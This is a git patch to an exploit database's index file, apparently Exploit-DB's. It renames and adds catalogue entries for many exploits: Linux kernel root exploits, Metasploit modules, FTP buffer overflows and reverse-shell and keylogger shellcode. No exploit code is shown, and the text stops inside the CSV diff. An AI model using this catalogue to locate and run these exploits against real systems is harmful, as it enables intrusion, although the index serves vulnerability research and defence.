From 412cc0a204c53238185d906dd1e2d2282e694849 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Thu, 23 Jun 2016 05:06:16 +0000 Subject: [PATCH] DB: 2016-06-23 4 new exploits Linux Kernel 2.4 - uselib() Privilege Elevation Exploit (2) Linux Kernel 2.4 - 'uselib()' Privilege Elevation Exploit (2) Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit (3) Linux Kernel 2.4.x / 2.6.x - 'uselib()' Local Privilege Escalation Exploit (3) Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit (1) Linux Kernel 2.6.23 <= 2.6.24 - 'vmsplice' Local Root Exploit (1) Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit (1) Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1) Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (2) Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (4) Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (3) Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (5) Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (4) Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (2) Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (5) Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (3) Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation (3) Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - 'Pipe.c' Privilege Escalation (3) Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation (1) Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit (2) UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS 
Vuln(1) UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(2) UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (1) UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (2) Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit (3) Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Root Exploit (3) Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2) Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (1) Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2) Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF) Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF) Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (Metasploit) Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (Metasploit) PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF) PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (Metasploit) Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf) Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit) Poison Ivy 2.1.x C2 Buffer Overflow (msf) Poison Ivy 2.1.x C2 Buffer Overflow (Metasploit) Bomgar Remote Support Unauthenticated Code Execution (msf) Bomgar Remote Support Unauthenticated Code Execution (Metasploit) Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (msf) Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit) DarkComet Server Remote File Download Exploit (msf) DarkComet Server Remote File Download Exploit (Metasploit) PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit) Wolf CMS 0.8.2 - Arbitrary File Upload Exploit (Metasploit) Windows x86 ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode --- files.csv | 50 +++--- 
platforms/linux/local/39277.c | 278 +++++++++++++----------------- platforms/linux/local/40003.c | 212 +++++++++++++++++++++++ platforms/php/remote/40004.rb | 132 ++++++++++++++ platforms/win32/shellcode/40005.c | 273 +++++++++++++++++++++++++++++ platforms/win64/remote/39999.rb | 140 +++++++++++++++ 6 files changed, 902 insertions(+), 183 deletions(-) create mode 100755 platforms/linux/local/40003.c create mode 100755 platforms/php/remote/40004.rb create mode 100755 platforms/win32/shellcode/40005.c create mode 100755 platforms/win64/remote/39999.rb
diff --git a/files.csv b/files.csv
index f1908ee12..80646c465 100755
--- a/files.csv
+++ b/files.csv
@@ -601,7 +601,7 @@ id,file,description,date,author,platform,type,port
 774,platforms/php/webapps/774.pl,"Siteman <= 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0
 775,platforms/linux/remote/775.c,"Berlios gpsd <= 2.7.x - Remote Format String Vulnerability",2005-01-26,JohnH,linux,remote,2947
 776,platforms/linux/local/776.c,"/usr/bin/trn - Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0
-778,platforms/linux/local/778.c,"Linux Kernel 2.4 - uselib() Privilege Elevation Exploit (2)",2005-01-27,"Tim Hsu",linux,local,0
+778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Elevation Exploit (2)",2005-01-27,"Tim Hsu",linux,local,0
 779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0
 780,platforms/windows/dos/780.c,"Xpand Rally <= 1.0.0.0 (Server/Clients) - Crash Exploit",2005-01-31,"Luigi Auriemma",windows,dos,28015
 781,platforms/windows/remote/781.py,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit",2005-02-01,"Tal Zeltzer",windows,remote,80
@@ -714,7 +714,7 @@ id,file,description,date,author,platform,type,port
 891,platforms/windows/dos/891.pl,"MCPWS Personal WebServer <= 1.3.21 - Denial of Service Exploit",2005-03-21,"Nico Spicher",windows,dos,0
 892,platforms/php/webapps/892.txt,"phpMyFamily <= 1.4.0 Admin Bypass SQL Injection",2005-03-21,kre0n,php,webapps,0
 893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service Exploit",2005-03-21,"GSS IT",windows,dos,0
-895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit (3)",2005-03-22,sd,linux,local,0
+895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - 'uselib()' Local Privilege Escalation Exploit (3)",2005-03-22,sd,linux,local,0
 896,platforms/osx/local/896.c,"Mac OS X <= 10.3.8 - (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0
 897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 - Change User Rights Authentication Bypass (c code)",2005-03-24,str0ke,php,webapps,0
 898,platforms/aix/local/898.sh,"AIX <= 5.3.0 (invscout) Local Command Execution Vulnerability",2005-03-25,ri0t,aix,local,0
@@ -4730,7 +4730,7 @@ id,file,description,date,author,platform,type,port
 5090,platforms/php/webapps/5090.pl,"Open-Realty <= 2.4.3 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0
 5091,platforms/php/webapps/5091.pl,"Journalness <= 4.1 (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0
 5092,platforms/linux/local/5092.c,"Linux Kernel 2.6.17 <= 2.6.24.1 - 'vmsplice' Local Root Exploit (2)",2008-02-09,qaaz,linux,local,0
-5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit (1)",2008-02-09,qaaz,linux,local,0
+5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - 'vmsplice' Local Root Exploit (1)",2008-02-09,qaaz,linux,local,0
 5094,platforms/php/webapps/5094.txt,"Mambo Component Comments <= 0.5.8.5g SQL Injection Vulnerability",2008-02-09,CheebaHawk215,php,webapps,0
 5095,platforms/php/webapps/5095.txt,"PKs Movie Database 3.0.3 - XSS / SQL Injection Vulnerabilities",2008-02-10,Houssamix,php,webapps,0
 5096,platforms/php/webapps/5096.txt,"ITechBids 6.0 (detail.php item_id) SQL Injection Vulnerability",2008-02-10,"SoSo H H",php,webapps,0
@@ -7984,7 +7984,7 @@ id,file,description,date,author,platform,type,port
 8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection Vulnerability",2009-04-17,"Hussin X",php,webapps,0
 8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling Vulnerability",2009-04-17,"Hussin X",php,webapps,0
 8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-17,HCOCA_MAN,php,webapps,0
-8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0
+8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0
 8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0
 8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0
 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability",2009-04-20,JosS,php,webapps,0
@@ -8900,7 +8900,7 @@ id,file,description,date,author,platform,type,port
 9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Remote Arbitrary Shell Upload Vulnerability",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0
 9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x (XSS/SQL/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0
 9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x (Redhat) - 'sock_sendpage()' Ring0 Local Root Exploit (1)",2009-08-14,spender,linux,local,0
-9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (2)",2009-08-14,"Przemyslaw Frasunek",linux,local,0
+9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (4)",2009-08-14,"Przemyslaw Frasunek",linux,local,0
 9437,platforms/php/webapps/9437.txt,"Ignition 1.2 (comment) Remote Code Injection Vulnerability",2009-08-14,"Khashayar Fereidani",php,webapps,0
 9438,platforms/php/webapps/9438.txt,"PHP Competition System <= 0.84 - (competition) SQL Injection Vulnerability",2009-08-14,Mr.SQL,php,webapps,0
 9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 (nFileId) Remote SQL Injection Vulnerability",2009-08-14,Mr.tro0oqy,php,webapps,0
@@ -8942,7 +8942,7 @@ id,file,description,date,author,platform,type,port
 9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0
 9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0
 9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80
-9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (3)",2009-08-24,"INetCop Security",linux,local,0
+9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (5)",2009-08-24,"INetCop Security",linux,local,0
 9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0
 9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0
 9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0
@@ -9058,7 +9058,7 @@ id,file,description,date,author,platform,type,port
 9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit",2009-09-09,"Pankaj Kohli",linux,local,0
 9596,platforms/windows/remote/9596.py,"SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389
 9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0
-9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (4)",2009-09-09,"Ramon Valle",linux,local,0
+9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (2)",2009-09-09,"Ramon Valle",linux,local,0
 9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 - Arbitrary File Upload Vulnerability",2009-09-09,Securitylab.ir,php,webapps,0
 9600,platforms/php/webapps/9600.txt,"OBOphiX <= 2.7.0 - (fonctions_racine.php) Remote File Inclusion Vulnerability",2009-09-09,"EA Ngel",php,webapps,0
 9601,platforms/php/webapps/9601.php,"Joomla Component BF Survey Pro Free SQL Injection Exploit",2009-09-09,jdc,php,webapps,0
@@ -9099,7 +9099,7 @@ id,file,description,date,author,platform,type,port
 9638,platforms/windows/remote/9638.txt,"Kolibri+ Webserver 2 - Remote Source Code Disclosure Vulnerability",2009-09-11,SkuLL-HackeR,windows,remote,0
 9639,platforms/php/webapps/9639.txt,"Image voting 1.0 (index.php show) SQL Injection Vulnerability",2009-09-11,SkuLL-HackeR,php,webapps,0
 9640,platforms/php/webapps/9640.txt,"gyro 5.0 (SQL/XSS) Multiple Vulnerabilities",2009-09-11,OoN_Boy,php,webapps,0
-9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (5)",2009-09-11,"Ramon Valle",linux,local,0
+9641,platforms/linux/local/9641.txt,"Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (3)",2009-09-11,"Ramon Valle",linux,local,0
 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit",2009-09-11,"Matthew Gillespie",multiple,dos,1812
 9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal Vulnerability",2009-09-11,"Usman Saeed",windows,remote,0
 9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 - (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80
@@ -9232,7 +9232,7 @@ id,file,description,date,author,platform,type,port
 9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
 9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
 9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - (.blend) Command Injection",2009-11-05,"Core Security",multiple,remote,0
-9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0
+9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - 'Pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0
 9845,platforms/osx/dos/9845.c,"OSX 10.5.6-10.5.7 - ptrace mutex DoS",2009-11-05,prdelka,osx,dos,0
 9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki <= 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0
 9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment <= 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0
@@ -13628,7 +13628,7 @@ id,file,description,date,author,platform,type,port
 15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 Safe Search for IE DoS",2010-12-06,Dr_IDE,windows,dos,0
 15698,platforms/windows/dos/15698.html,"Flash Player - (Flash6.ocx) AllowScriptAccess DoS PoC",2010-12-06,Dr_IDE,windows,dos,0
 15699,platforms/php/webapps/15699.txt,"phpMyAdmin - Client Side Code Injection and Redirect Link Falsification (0day)",2010-12-06,"emgent white_sheep and scox",php,webapps,80
-15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
+15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation (1)",2010-12-07,"Dan Rosenberg",linux,local,0
 33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
 15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 - Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0
 15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0
@@ -15436,7 +15436,7 @@ id,file,description,date,author,platform,type,port
 17772,platforms/windows/dos/17772.txt,"BroadWin WebAccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0
 17773,platforms/php/webapps/17773.txt,"WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 - SQL Injection Vulnerability",2011-09-03,"Miroslav Stampar",php,webapps,0
 17774,platforms/php/webapps/17774.txt,"openads-2.0.11 - Remote File Inclusion Vulnerability",2011-09-03,"HaCkErS eV!L",php,webapps,0
-17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit",2011-09-05,"Jon Oberheide",linux,local,0
+17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit (2)",2011-09-05,"Jon Oberheide",linux,local,0
 17777,platforms/windows/local/17777.rb,"Apple QuickTime PICT PnSize Buffer Overflow",2011-09-03,metasploit,windows,local,0
 17778,platforms/php/webapps/17778.txt,"WordPress Zotpress plugin <= 4.4 - SQL Injection Vulnerability",2011-09-04,"Miroslav Stampar",php,webapps,0
 17779,platforms/php/webapps/17779.txt,"WordPress oQey Gallery plugin <= 0.4.8 - SQL Injection Vulnerability",2011-09-05,"Miroslav Stampar",php,webapps,0
@@ -16913,8 +16913,8 @@ id,file,description,date,author,platform,type,port
 19548,platforms/php/webapps/19548.txt,"gp easy CMS Minishop 1.5 Plugin Persistent XSS",2012-07-03,"Carlos Mario Penagos Hollmann",php,webapps,0
 19549,platforms/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",php,webapps,0
 19550,platforms/php/webapps/19550.txt,"phpMyBackupPro <= 2.2 - Local File Inclusion Vulnerability",2012-07-03,dun,php,webapps,0
-19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(1)",1997-02-13,"Last Stage of Delirium",multiple,local,0
-19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vuln(2)",1997-02-13,"Solar Designer",multiple,local,0
+19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0
+19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5_AIX <= 4.2_libc <= 5.2.18_RedHat 4_IRIX 6_Slackware 3 NLS Vulnerability (2)",1997-02-13,"Solar Designer",multiple,local,0
 19553,platforms/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 mylog/mlog Vulnerability",1997-10-19,"Bryan Berg",php,remote,0
 19554,platforms/hardware/remote/19554.c,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 Vulnerability (1)",1998-03-16,Rootshell,hardware,remote,0
 19555,platforms/hardware/remote/19555.pl,"Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 Vulnerability (2)",1998-03-17,Rootshell,hardware,remote,0
@@ -30081,7 +30081,7 @@ id,file,description,date,author,platform,type,port
 33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
 33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
 33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 - (.ogg) Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
-33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit (3)",2013-02-24,SynQ,linux,local,0
+33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Root Exploit (3)",2013-02-24,SynQ,linux,local,0
 33353,platforms/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,hardware,webapps,80
 33354,platforms/php/webapps/33354.txt,"PHD Help Desk 1.43 area.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
 33355,platforms/php/webapps/33355.txt,"PHD Help Desk 1.43 solic_display.php q_registros Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0
@@ -35510,7 +35510,8 @@ id,file,description,date,author,platform,type,port
 39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
 39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21
 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
-39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)",2016-01-19,"Perception Point Team",linux,local,0
+39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (1)",2016-01-19,"Perception Point Team",linux,local,0
+40003,platforms/linux/local/40003.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2)",2016-01-19,"Federico Bento",linux,local,0
 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0
 39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin 'ss_handler.php' SQL Injection Vulnerability",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
 39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
@@ -35922,11 +35923,11 @@ id,file,description,date,author,platform,type,port
 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0
 39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
 39723,platforms/lin_x86/shellcode/39723.c,"Linux x86 Shellcode - Bind TCP Port 1472 (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
-39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
-39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF)",2016-04-25,"Federico Scalco",hardware,webapps,443
+39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443
+39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443
 39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Local Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0
 39728,platforms/lin_x86-64/shellcode/39728.py,"Linux x64 - Bind Shell Shellcode Generator",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0
-39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)",2016-04-25,"Jonathan Smith",win32,remote,21
+39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (Metasploit)",2016-04-25,"Jonathan Smith",win32,remote,21
 39730,platforms/ruby/webapps/39730.txt,"NationBuilder Multiple Stored XSS Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443
 39731,platforms/windows/shellcode/39731.c,"Windows Null-Free Shellcode - 
Primitive Keylogger to File - 431 (0x01AF) bytes",2016-04-25,Fugu,windows,shellcode,0
 39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC",2016-04-25,"David Silveiro",linux,dos,0
@@ -36062,7 +36063,7 @@ id,file,description,date,author,platform,type,port
 39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80
 39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80
 39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
-39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)",2016-05-31,"Ian Lovering",windows,remote,0
+39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
 39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
 39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
 39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
@@ -36094,7 +36095,7 @@ id,file,description,date,author,platform,type,port
 39904,platforms/asp/webapps/39904.txt,"Cisco EPC 3928 - Multiple Vulnerabilities",2016-06-07,"Patryk Bogdan",asp,webapps,0
 39905,platforms/php/webapps/39905.txt,"Drale DBTableViewer 100123 - Blind SQL Injection",2016-06-08,HaHwul,php,webapps,80
 39906,platforms/multiple/dos/39906.txt,"Microsoft Word (Win/Mac) - Crash PoC",2016-06-09,halsten,multiple,dos,0
-39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x C2 Buffer Overflow (msf)",2016-06-10,"Jos Wetzels",windows,remote,3460
+39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x C2 Buffer Overflow (Metasploit)",2016-06-10,"Jos Wetzels",windows,remote,3460
